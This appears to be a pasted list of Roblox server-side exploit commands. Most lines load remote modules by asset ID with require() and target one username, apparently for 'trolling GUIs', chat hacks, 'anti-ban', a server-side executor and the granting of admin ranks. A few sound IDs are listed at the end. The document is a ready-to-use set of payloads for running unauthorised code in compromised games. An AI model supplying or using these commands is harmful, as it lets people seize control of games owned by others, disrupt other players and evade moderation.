Ultimare Trolling GUI: require(3146633195):Fire("adulfhtiIer") , require(3397500272):Fire("adulfhtiIer")

ChatHax: require(4461309866):Fire("adulfhtiIer")

Anti-Ban: require(2788315378).load("adulfhtiIer",{"RobloxGamerEpic342","GeneratedBread","IegaIism","cependant","adulfhtiIer"})

OP GUI: require(3067895222):Fire('adulfhtiIer')

require(4293470325):Fire("adulfhtiIer")

HD Admin: require(game:GetService("ReplicatedStorage"):WaitForChild("HDAdminSetup")):GetMain():GetModule("API"):SetRank(game.Players.adulfhtiIer, 4, "Perm")

Anti-Ban 2.0: require(3986243232).load("m john doe is real",{"adulfhtiIer"})

Kohls Admin Giver: _G.setPower:Fire(adulfhtiIer, -6)

Baldi: require(4557775622).Fire("adulfhtiIer")

Boom SS: require(3420796356).load("adulfhtiIer")

Caramelldansen: require(4557797164).Fire("adulfhtiIer")

SS Executor: require(3155998155).naenae("adulfhtiIer")

Jojo: require(4492201587).load("adulfhtiIer")

Goner: require(4536456687):Fire("adulfhtiIer", "a")

Void Boss 2: require(4572736599):Fire("adulfhtiIer")

Thanos Car: require(2806433728).thcar("adulfhtiIer")

Megalovania: 3745550364

Gravity Falls: 1429554774

Stronger than you Sans: 367908975

Undertale Remix: 2112150271

Mine Diamonds: 596886258

Rare MML admin - require(2808676257):hack'adulfhtiIer'
